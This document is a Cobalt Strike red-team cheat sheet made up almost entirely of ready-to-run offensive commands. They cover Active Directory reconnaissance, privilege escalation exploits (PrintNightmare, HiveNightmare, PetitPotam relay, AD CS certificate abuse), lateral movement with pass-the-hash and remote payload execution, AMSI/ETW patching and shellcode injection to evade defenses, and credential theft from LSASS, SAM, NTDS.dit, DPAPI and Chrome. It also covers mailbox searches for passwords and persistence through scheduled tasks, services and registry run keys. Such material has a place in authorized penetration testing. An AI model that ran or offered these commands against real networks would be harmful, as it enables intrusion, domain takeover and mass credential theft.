Cobalt Strike Red Team Cheat Sheet
Overview
- Malleable C2 Profiles
- Reflective Shellcode Loaders
- Domain Enumeration
- Local Privilege Escalation
- Lateral Movement
- Domain Privilege Escalation
- Defense Evasion
- Exploitation
- Exfiltration - Password Attacks
- Exfiltration - Email
- Persistence
- Cobalt Strike BOFs
- References
Malleable C2 Profiles
A collection of tools used to generate new malleable C2 profiles to use with Cobalt Strike and better obfuscate your traffic/commands.
Reflective Shellcode Loaders
Shellcode loaders to add in Cobalt Strike before generating your shellcode which are used to reflectively generate shellcode for added obfuscation, encryption, and ultimately better evasion.
- AceLdr
- TitanLdr
- BokuLoader - Bobby Cooke's reflective loader
Domain Enumeration
Running PowerView and SharpView
# PowerView:
powershell-import --> Select PowerView.ps1 to import PS1 file in memory
powershell Get-Module PowerView
powershell Get-NetUser -Identity testuser -Domain lab.com
# SharpView
execute-assembly C:\SharpView.exe Invoke-CheckLocalAdminAccess --> Check servers for local admin using current privileges
Running ActiveDirectory module
powershell import --> Select \ADModule\Microsoft.ActiveDirectory.Management.dll file from https://github.com/samratashok/ADModule
powershell Get-ADDomainController -Domain lab.com
Running Sharphound (.NET version of Bloodhound) for AD domain collection
# Running SharpView in memory (.NET version of PowerView)
execute-assembly C:\SharpHound.exe --CollectionMethod All --Domain lab.com --Stealth --excludedomaincontrollers --windowsonly --OutputDirectory C:\users\testuser\appdata\local\temp\
# Collecting only user sessions to determine who is logged in and where:
execute-assembly C:\SharpHound.exe --CollectionMethod Session,LoggedOn --Outputdirectory C:\temp\
# Collection methods reference: https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound-all-flags.html
AD Recon tool - Perform different collection methods (ACLs, OUs, DCs, etc.) and output to Excel files
powershell-import --> ADRecon.ps1
# Perform all collection methods:
powershell ADRecon -OutputDir .\ -DomainController ops-dc.lab.com
Get domain trusts and domain controllers with built-in nltest.exe
utility
# Get all domain controllers of a domain
run nltest /dclist:domain.com
# Get domain trusts
run nltest /trusted_domains
powershell-import --> Select PowerView.ps1 to import PS1 file in memory
# Find all domain shares that the current user has access to
powershell Find-DomainShare -CheckShareAccess
# Find interesting domain share files
powershell Find-InterestingDomainShareFile -ComputerDomain DOMAIN.COM
SharpShares - List accessible shares on remote systems and check read/write privileges
# Find all accessible network shares in a domain, exclude default share names (SYSVOL,netlogon,ipc$,print$), and perform read/write access checks
execute-assembly C:\SharpShares.exe /ldap:all /filter
# Find all server shares (including DCs), exclude default share names, perform read/write access checks and output to file
execute-assembly C:\SharpShares.exe /ldap:servers /filter /outfile:find-domain-shares.txt
Snaffler - Automated network share enumeration to look for interesting files/creds
# Run Snaffler on all domain systems found, output to console and file
execute-assembly C:\snaffler.exe -d DOMAN.COM -s -o C:\temp\snaffler.log
# Run Snaffler on only target hosts
execute-assembly C:\snaffler.exe -s -o C:\temp\snaffler2.log -n hostname1.domain.com,hostname2.domain.com,hostname3.domain.com
Miscellaneous Remote Workstation/Server stuff
List and kill processes on remote system (requires local Admin)
- Using tasklist.exe and taskkill.exe
run tasklist /s SERVER.domain.com --> List remote processes
run taskkill /s SERVER.domain.com /IM PROCESS.exe --> Kill remote process
- Using CIMplant
execute-assembly CIMplant.exe -s [remote-IP-address] -c ps --> List remote processes
execute-assembly CIMplant.exe -s [remote-IP-address] -c process_kill <ProcessName/PID> --> Kill remote process
Local Privilege Escalation
PowerUp - PowerSploit module
powershell-import --> PowerUp.ps1
powerpick Invoke-AllChecks | Out-File -Encoding ASCII PowerUp-checks.txt
SharpUp - .NET port of PowerUp
# Run all checks automatically - output to console
execute-assembly C:\SharpUp.exe audit
# Run an individual check
execute-assembly SharpUp.exe HijackablePaths
WinPEAS - Windows Privilege Escalation Awesome Script
execute-assembly winpeas.exe #run all checks
SeatBelt - .NET tool by GhostPack
GREAT tool to query a local system to gather system/user/remote/misc data Can be used as Admin or normal-privileged user
# Run ALL checks - returns TONS of data
execute-assembly C:\SeatBelt.exe -group=all -full -outputfile="C:\Temp\SeatBelt-all.json"
# Run only user-related checks - returns things like Chrome data, DPAPI keys, IE tabs, Windows vault/credentials, etc.
execute-assembly C:\SeatBelt.exe -group=user -outputfile="C:\Temp\SeatBelt-user.json"
# Run only system-related checks - returns things like Antivirus, Applocker, env path/variables, local users/groups, WMI, sysmon, UAC, etc.
execute-assembly C:\SeatBelt.exe -group=system -outputfile="C:\Temp\SeatBelt-system.json"
# Run only Chrome checks - returns bookmarks, history, presence
execute-assembly C:\SeatBelt.exe -group=chromium -outputfile="C:\Temp\SeatBelt-chrome.json"
# Run only remote-related checks - returns things like network shares, putty sessions, RDP connections/settings, Filezilla, Windows firewall, etc.
execute-assembly C:\SeatBelt.exe -group=remote -outputfile="C:\Temp\SeatBelt-remote.json"
# Run only miscellaneous-related checks - returns things like Chrome data, logon events, LOBAS, interesting files, downloads, PS events, scheduled tasks, etc.
execute-assembly C:\SeatBelt.exe -group=misc -outputfile="C:\Temp\SeatBelt-misc.json"
Watson - .NET version of Sherlock.ps1 to look for missing KBs on Windows
# Peroform all checks and output to console
# Supports:
Windows 10 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004
Server 2016 & 2019
execute-assembly C:\Watson.exe
PrintNightmare priv esc exploit (CVE-2021-3452)
# Impacket's PrintNightmare: https://github.com/cube0x0/CVE-2021-1675
# Impacket's SharpNightmare (Csharp): https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare
# PowerShell PrintNightmare local priv esc: https://github.com/calebstewart/CVE-2021-1675
# Local priv esc
execute-assembly C:\SharpPrintNightmare.exe C:\addCube.dll
# RCE using existing context
execute-assembly C:\SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' '\\192.168.1.20'
# RCE using runas /netonly
execute-assembly C:\SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' '\\192.168.1.10' hackit.local domain_user Pass123
HiveNightmare priv esc SAM dump (CVE-2021–36934)
Exploit in Windows 10 and 11 which allows you to read the SAM, SYSTEM and SECURITY hives as a low-privileged user
# First check privileges to read SAM hive
run icacls C:\Windows\System32\config\SAM
--> If the results show success and the group BUILTIN\Users has privileges (I)(RX) then the SAM file should be readable by all users!
# Exploit: Csharp implementation [HERE](https://github.com/cube0x0/CVE-2021-36934)
execute-assembly C:\CVE-2021-36934.exe
--> Dumps hashes to console upon successful exploitation
Stealing logon tokens
If you obtained local Administrator privileges, you can steal a session token of another process to inherit their token privileges. This might require you to escalate to a SYSTEM Beacon if its being blocked.
steal_token <PID>
Elevating to SYSTEM Beacon
Assuming you gained local administrator privileges, one option to elevate to a SYSTEM Beacon is to use scheduled tasks to create a new scheduled task to run your payload as SYSTEM.
run schtasks /create /tn "TaskName" /sc once /U DOMAIN\username /P Password1! /tr "cmd.exe /c C:\path\to\Payload.exe" /ru SYSTEM
run schtasks /run /tn "TaskName" --> Should pop SYSTEM Beacon
Lateral Movement
Cobalt Strike jumping (OUTDATED)
# Jump using WinRM if it's enabled for the current user on the target system
jump winrm64 ops-jumpbox.lab.com HTTPSLISTENER
# Jump using PsExec if it's enabled for the current user on the target system
jump psexec64 ops-jumpbox.lab.com HTTPSLISTENER
Cobalt Strike remote-exec - Executes commands on a target system using psexec, winrm or wmi (OUTDATED)
# remote-exec using WMI
remote-exec wmi ops-jumpbox.lab.com cmd.exe /c "C:\Users\Public\payload.exe"
# remote-exec using PsExec
remote-exec psexec ops-jumpbox.lab.com cmd.exe /c "C:\Users\Public\payload.exe"
Enable Powershell Remoting manually
# Enable on local system with Admin privileges
powershell Enable-PSRemoting –Force
# Enable on remote system
make_token AD\admin Password123! --> Token with Admin privileges on remote system is required
run psexec.exe \\TestComputer.lab.com -h -s powershell.exe Enable-PSRemoting -Force
# Test remote access
powershell Invoke-Command -ComputerName TestComputer -ScriptBlock { whoami; hostname }
RACE.ps1: ACL attacks for lateral movement, persistence and privilege escalation Stealthier than above method since it doesn't touch disk
powershell-import --> RACE.ps1
make_token AD\Admin password --> This tool requires Admin privileges on the remote system being targeted
powershell Set-RemotePSRemoting -SamAccountName testuser -ComputerName ops-jumpbox.lab.com --> Force enable PS remoting for the specific user
powershell Set-RemoteWMI -SamAccountName testuser -Computername ops-jumpbox.lab.com --> (Optional) Force enable WMI for the specific user
# Now we can move laterally in CS with WinRM for the specified user
make_token AD\testuser password
jump [winrm/winrm64] ops-jumpbox.lab.com HTTPSLISTENER
Scheduled task lateral movement
# First copy payload files to remote system manually
# Create task on remote system
run schtasks /create /tn "MyTask" /sc once /U DOMAIN\username /P Password1! /S target-host.domain.com /tr "cmd.exe /c C:\Windows\temp\Payload.exe"
# Execute remote task
run schtasks /run /tn "MyTask" /S target-host.domain.com
Invoke-TheHash - PS tools to perform SMB and WMI pass-the-hash attacks
powershell-import
powerpick Invoke-WMIExec -Target 192.168.100.20 -Domain LAB.com -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose
powerpick Invoke-SMBExec -Target 192.168.100.20 -Domain LAB.com -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose
Over-pass-the-hash with Rubeus Inject a ticket into memory using known credentials and then move to a system that user has access to
# Revert to original token in CS
rev2self
# Create and inject new ticket into memory
execute-assembly C:\Rubeus.exe asktgt /domain:lab.com /user:admin1 /rc4:<NTLM-hash> /ptt
# Run network commands as that user
ls \\jumpbox.lab.com\C$
jump winrm64 jumpbox.lab.com
Move Kit Aggressor script using execute-assembly, SharpMove and SharpRPD assemblies for doing lateral movement with various techniques
SharpExec - CSharp tooling lateral movement
# WMI lateral movement
execute-assembly SharpExec.exe -m=wmi -i=IPADDRESS -u=USER -p=PASSWORD -d=DOMAIN -e=C:\Windows\System32\cmd.exe -c="/c C:\path\to\payload"
# PSExec lateral movement
execute-assembly SharpExec.exe -m=psexec -i=IPADDRESS -u=USER -p=PASSWORD -d=DOMAIN -e=C:\Windows\System32\cmd.exe -c="/c C:\path\to\payload"
Domain Privilege Escalation
GPP Passwords
Get-GPPPassword.ps1 PowerSploit module
# Get-GPPPassword Searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords
powershell-import --> Get-GPPPassword.ps1
powerpick Get-GPPPassword -Server ops-dc01.lab.com
Net-GPPPassword .NET port of get-gpppassword
execute-assembly C:\Net-GPPPassword.exe lab.com
Get-GPPAutologon.ps1 PowerSploit module
# Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password
powershell-import --> Get-GPPAutologon.ps1
powerpick Get-GPPAutolgon
LAPS Passwords
SharpLaps - Retrive LAPS password from AD
The attribute ms-mcs-AdmPwd stores the clear-text LAPS password which is targeted here from LDAP
execute-assembly SharpLAPS.exe /user:DOMAIN\USER /pass:PASSWORD /host:IPADDRESS
Password spraying
powershell-import --> DomainPasswordSpray.ps1
# Get the full domain user list (Optional)
powershell Get-DomainUserList -Domain lab.com -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt
# Password spray from a username and password list
powershell Invoke-DomainPasswordSpray -UserList userlist.txt -PasswordList passlist.txt -Domain lab.com -OutFile sprayed-creds.txt
# Auto spray a specific password on an auto-generated user list (very noisy)
powershell Invoke-DomainPasswordSpray -Password Summer2021
Rubeus brute-force password spraying a single password or using a password file
execute-assembbly C:\Rubeus.exe brute /password:Password123! /domain:lab.com /noticket /outfile:passes-sprayed.txt [/passwords:PASSWORDS_FILE>] [/user:USER | /users:USERS_FILE] [/creduser:DOMAIN\\USER & /credpassword:PASSWORD] [/dc:DOMAIN_CONTROLLER] [/verbose] [/nowrap]
SharpSpray - .NET port of PowerSpray.ps1
# By default it will automatically generate a user list from the domain using LDAP
# Sleeps 30 minutes between each password cycle, delays 300 milliseconds between each password guess attempt
execute-assembly C:\SharpSpray.exe --Passwords Summer2021,Fall2021 --Sleep 30 --Delay 300
Kerberoasting
PowerView kerberoasting (Outdated and still reliant on PowerShell)
# Get users with SPN set
powershell Get-DomainUesr -SPN
# Kerberoast all users
powershell Invoke-Kerberoast - OutputFormat hashcat | fl
# Kerberoast specific user
powershell Invoke-Kerberoast -Identity testaccount -Domain lab.com -OutputFormat hashcat | fl
Rubeus kerberoasting
# Kerberoast all users
execute-assembly C:\Rubeus.exe kerberoast /outfile:KerbHashes.txt /domain:lab.com
# Kerberoast specific user
execute-assembly C:\Rubeus.exe kerberoast /outfile:KerbHash.txt /user:testaccount /domain:lab.com
AS-REP Roasting
Target users in AD that do not require pre-authentication
# AS-REP roast all users with Rubeus
execute-assembly C:\Rubeus.exe asreproast /format:hashcat /outfile:C:\Temp\asrep-hashes.txt
# AS-REP roast specific user with Rubeus
execute-assembly C:\Rubeus.exe asreproast /user:testuser /format:hashcat /outfile:C:\Temp\asrep-hashes.txt
Coercion attacks
PetitPotam - NTLM relay to AD CS
PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions
- Requires AD CS web server enrollment enabled
- Requries Kali running Impacket on target domain
# Find AD CS web server and verify if web enrollment is enabled by browsing to the URL: `http://ADCS-server.domain.com/certsrv/`
run certutil.exe
# Start NTLM relay server on Kali
python3 ntlmrelayx.py -t http://ADCS-server.domain.com/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
# Force coercion via PetitPotam in Cobalt Strike Beacon - Observe "Attack Success!!!" in output if it worked
run PetitPotam.exe <Kali-Listener-IP> <DC-IP>
# NTLM relay output will have base64 ticket of target DC machine account
# Use Rubeus to request TGT of DC machine account to esclate to Domain Admin
execute-assembly C:\Rubeus.exe asktgt /dc:<DC-IP> /domain:domain.com /user:<DC-Machine-account>$ /ptt /certificate:<base64-ticket-from-output>
# Verify asktgt command worked by doing an 'ls' command on the DC
ls \\<DC-IP>\c$
References:
- https://pentestlab.blog/2021/09/14/petitpotam-ntlm-relay-to-ad-cs/
- https://hakin9.org/domain-takeover-with-petitpotam-exploit/
Defense Evasion
Shellcode injection techniques
Several methods here within Cobalt Strike or using BOFs
# Spawn a beacon into an existing process
inject <PID> <x86|x64> HTTPSLISTENER
# Inject raw shellcode into an existing process
# Create shellcode: Cobbalt Strike --> Attacks --> Packages --> Windows Executable (S) --> Output = Raw --> Creates "beacon.bin" file
shinect <PID> <x86|x64> C:\beacon.bin
# Shellcode injection methods using Windows syscalls with [BOFs script](https://github.com/ajpc500/BOFs)
syscalls_inject <PID> <listener_name>
syscalls_shinject <PID> C:\beacon.bin
static_syscalls_inject <PID> <listener_name>
static_syscalls_shinject <PID> C:\beacon.bin
syscalls_shspawn C:\beacon.bin
AMSI patch
BOF-patchit for current process
patchit amsi
boku7/InjectAmsiBypass BOF
Patch AMSI in remote process
inject-amsiBypass <PID>
ETW patch
BOF-patchit for current process
patchit etw
ajpc500/BOFs ETW patch for current process
etw stop
/ etw start
API Unhooking
Cobalt Strike's hail-mary unhooking function. "This is a Beacon Object File to refresh DLLs and remove their hooks. The code is from Cylance's Universal Unhooking research"
unbook
Exploitation
DPAPI decryption and extraction on Windows systems
# SharpDPAPI to retrieve domain DPAPI backup key and output to file which is used for subsequent attacks (requires DA privileges)
execute-assembly C:\SharpDPAPI.exe backupkey /file:key.pvk
# Decrypt any RDG (remote desktop) passwords found using the domain backup key (can also use local Admin account or master key)
execute-assembly C:\SharpDPAPI.exe rdg /pvk:key.pvk /unprotect
# Decrypt any KeePass passwords found using the domain backup key (can also use local Admin account or master key)
execute-assembly C:\SharpDPAPI.exe keepass /pvk:key.pvk /unprotect
SharpChrome to extract and decrypt a user's Chrome sessions/passwords
# Dump Chrome logins on the local system for the current user
execute-assembly C:\SharpChrome.exe logins /unprotect
# Dump Chrome cookies on the local system for the current user
execute-assembly C:\SharpChrome.exe cookies
# Dump Chrome cookies on the local system only for a specific URL - Output in JSON format to import into "Cookie Editor" browser extension
execute-assembly C:\SharpChrome.exe cookies /format:json /browser:chrome /url:".*microsoft.com"
# Dumping Chrome login passwords on remote machines using the domain backup key (can also use local user password)
execute-assembly C:\SharpChrome.exe logins /pvk:key.pvk /server:SERVER.lab.com
# Dumping and decryptiong Chrome user cookies and sessions on remote machines using the domain backup key (can also use local user password)
# Cookies can then be imported into Chrome/Firefox using the extension Cookie-Editor
execute-assembly C:\SharpChrome.exe cookies /pvk:key.pvk /server:SERVER.lab.com
SharpWeb - Retrieve saved credentials in Chrome, Firefox and Edge
# Retrive all saved browser credentials
execute-assembly C:\SharpWeb.exe all
Active Directory Certificate Services (AD CS) Attack
Certify - GhostPack
Enumerate and abuse misconfigurations in AD CS
# Find vulnerable certificates with Certify.exe
execute-assembly C:\Certify.exe find /vulnerable /domain:lab.com
# Request a new certificate for a vulnerable template from the above output
execute-assembly C:\Certify.exe request /ca:lab.com\ops-dc01 /template:VulnTemplate /altname:DomainAdminUser1
# Copy the certificate private key from the above output to a file, then request a TGT using the certificate file with Rubeus
execute-assembly C:\Rubeus.exe asktgt /user:DomainAdminUser1 /certificate:C:\Temp\cert.pfx /domain:lab.com
Certipy - Python
Use Python through a SOCKS proxy or a Linux VM on the domain to find and exploit misconfigured AD CS certs
# First, start a SOCKS proxy in Cobalt Strike (or skip to the next step if you have an on-site Linux VM)
socks <port>
# Configure proxychains on Kali/Linux VM to proxy traffic through C2
# Find vulnerable certs with Certipy through proxy
proxychains certipy find -u '[email protected]' -p 'PASSWORD' -dc-ip 10.100.32.200 -vulnerable -timeout 30
# Request a certificate for a vulnerable cert template through proxy
proxychains certipy req -u '[email protected]' -p 'PASSWORD' -dc-ip 10.100.32.200 -ca corp-DC-CA -target ca.domain.com -template VulnTemplate -debug -upn '[email protected]'
# Authenticate with the output .PFX cert file to reequset a TGT for the DomainAdminAcc user
proxychains certipy auth -pfx DomainAdminAcc.pfx -username DomainAdminAcc -domain 'domain.com' -dc-ip X.X.X.X
--> Command will output NTLM hash of target account and the user's certificate
# Use the output certificate of the DomainAdminAcc account with Rubeus
execute-assembly C:\Rubeus.exe asktgt /user:DomainAdminAcc /certificate:DomainAdminAcc.pfx /ptt /domain:domain.com /dc:DomainController.domain.com
ls \\DomainController\c$ --> Verify command was successfully by doing an 'ls' cmd on the DC
MalSCCM - Exploiting SCCM servers to deploy malicious applications
- Requires admin privileges on target SCCM server
# Find the SCCM management servers
execute-assembly C:\MalSCCM.exe locate
# Check if the current host is an SCCM client
execute-assembly C:\MalSCCM.exe
# Gather all info from SCCM including users, groups, forest, application, deployments
execute-assembly C:\MalSCCM.exe inspect /all /server:<PrimarySiteFQDN>
# You can use MalSCCM to deploy a malicious application to a target group then force the users to check-in and run your payload
# This is explained in MUCH more details in the walkthrough here: https://labs.nettitude.com/blog/introducing-malsccm/
Exfiltration - Password Attacks
Dumping LSASS locally (all commands below require local Admin)
Mimikatz built-in to dump passwords/hashes to console
# Works against most updated systems with AV/EDR if running as SYSTEM
logonpasswords
Dumping LSASS with ProcDump.exe (requires touching disk) (NOTE: Might get flagged by AV and raise alerts but can still output LSASS dump file)
upload --> ProcDump.exe
run ProcDump.exe -accepteula -ma lsass.exe lsass.dmp
Dumping LSASS with Out-Minidump.ps1 from PowerSploit without touching disk
powershell Get-Process | Out-Minidump -DumpFilePath C:\temp
Extract LSASS process with SafetyKatz
execute-assembly C:\SafetyKatz.exe --> Dumps LSASS process to .dmp file on the local system
Extracting passwords/hashes offline from LSASS dump using Mimikatz (ON YOUR OWN SYSTEM!)
mimikatz.exe log "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords /all" "sekurlsa::wdigest" exit (Run on your local box)
SAM database dump
SAM dump built into CS - Injects into LSASS to dump local SAM database hashes to console
hashdump
SAM dump using reg.exe
run reg.exe save HKLM\sam sam.save
run reg.exe save HKLM\security security.save
run reg.exe save HKLM\system system.save
# Download SAM files then dump hahses offline using Secretsdump.py
download sam.save
download security.save
download system.save
python secretsdump.py -sam sam.save -security security.save -system system.save LOCAL (Run **ON YOUR OWN SYSTEM**)
SharpSecDump SAM and LSA extraction
Remotely dump SAM and LSA secrets (same functionality as Impacket's secretsdump.py)
# Runs in the context of the current user
# Local Admin privileges is required on the target machine
execute-assembly C:\SharpSecDump.exe -target=192.168.1.15 -u=admin -p=Password123 -d=lab.local
NTDS.dit dump (all commands below require Domain Admin privileges!)
Invoke-DCSync.ps1 to perform DCSync attacks remotely
powershell-import --> Invoke-DCSync.ps1
# Perform DC Sync hash dump for all users in the target domain
powershell Invoke-DCSync -Domain lab.local [-DomainController ops-dc01.lab.local]
# Perform DC Sync hash dump for all users in the specified group
powershell Invoke-DCSync -Domain lab.local -GroupName "Domain Admins" | ft -wrap -autosize
Copy-VSS.ps1 from Nishang toolkit to dump NTDS.dit locally on the DC
powershell-import --> Copy-VSS.ps1
powerpick Copy-VSS -DestinationDir C:\temp
NTDSutil.exe to dump NTDS.dit locally on a Domain Controller
run ntdsutil.exe activate instance ntds,ifm,create full C:\ntdsutil,quit,quit | ntdsutil
Exfiltration - Email
MailSniper
PowreShell tool to search mailboxes in a Microsoft Exchange environment
powershell-import -> Select MailSniper.ps1
# Search all mailboxes in a domain - Looks for "*password*","*creds*","*credentials*"
powershell Invoke-GlobalMailSearch -ImpersonationAccount current-username -ExchHostname ExchangeHost.domain.com -OutputCsv global-email-search.csv
# Search the current users mailbox
powershell Invoke-SelfSearch -Mailbox [email protected]
# Get the Global Address List (GAL)
powershell Get-GlobalAddressList -ExchHostname ExchangeHost.domain.com -UserName domain\username -Password P@ssw0rd! -OutFile gal.txt
Persistence
SharpStay - .NET Persistence
# Scheduled task persistence
execute-assembly C:\Sharpstay.exe action=ScheduledTask taskname=TestTask command="C:\windows\temp\file.exe" runasuser=testuser triggertype=logon author=Microsoft Corp. description="Test Task" logonuser=testuser
# Service creation persistence
execute-assembly C:\Sharpstay.exe action=CreateService servicename=TestService command="C:\Windows\temp\file.exe"
# User registry key persistence
execute-assembly C:\Sharpstay.exe action=UserRegistryKey keyname=Debug keypath=HKCU:Software\Microsoft\Windows\CurrentVersion\Run command="C:\Windows\temp\file.exe"
# Many other methods available on the tool's github documentation
# List persistence entries
execute-assembly C:\SharPersist.exe -t [reg,schtaskbackdoor,startupfolder,service] -m list
# Registy persistence
execute-assembly C:\SharPersist.exe -t reg -c "C:\Windows\System32\cmd.exe" -a "/c payload.exe" -k "hkcurun" -v "Test Payload" -m add -o env
# Scheduled task backdoor persistence
execute-assembly C:\SharPersist.exe -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c payload.exe" -n "Test Scheduled Task" -m add -o daily
# Startup folder persistence
execute-assembly C:\SharPersist.exe -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c payload.exe" -f "Test File on Startup" -m add
# Windows service persistence
execute-assembly C:\SharPersist.exe -t service -c "C:\Windows\System32\cmd.exe" -a "/c payload.exe" -n "Test Service" -m add
StayKit - Cobalt Strike persistence kit aggressor script
Cobalt Strike BOFs
BOF.NET
A .NET runtime tool to load assemblies in memory and avoid the typical fork-and-run model from execute-assembly
. Use BOF.NET to run any .NET tool for better evasion by residing in your current process. Note that this will not bypass AMSI or ETW as those will have to be unhooked separately, if needed.
bofnet_init
bofnet_load /path/to/assembly.exe
bofnet_listassemblies
bofnet_executeassembly AssemblyName argument1 argument2
References
Cobalt Strike commands cheat sheet
PowerShell remoting cheat sheet